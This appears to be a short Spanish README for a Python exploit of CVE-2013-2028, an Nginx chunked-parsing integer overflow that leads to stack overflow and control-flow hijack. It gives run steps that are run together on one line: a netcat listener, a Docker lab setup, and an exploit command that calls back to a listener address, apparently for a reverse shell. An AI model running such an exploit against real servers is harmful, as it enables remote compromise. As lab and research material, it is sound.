
Exploit en Python para CVE-2013-2028
Software vulnerable: Nginx 1.3.9 < 1.4.0
Commit con la corrección: https://github.com/nginx/nginx/commit/4997de8005630664ab35f27140e2077e818b21a7
La vulnerabilidad existe en la función ngx_http_parse_chunked. Este exploit desencadena un desbordamiento de entero en ngx_http_parse_chunked y, posteriormente, lo utiliza para desbordar la pila y secuestrar el flujo de control.
El exploit real contiene 4 pasos:
nc -lvp 4345sudo docker-compose up --buildpython2 exploit.py -ra 127.0.0.1 -rp 8081 -la <listener machine address> -lp <listener machine port>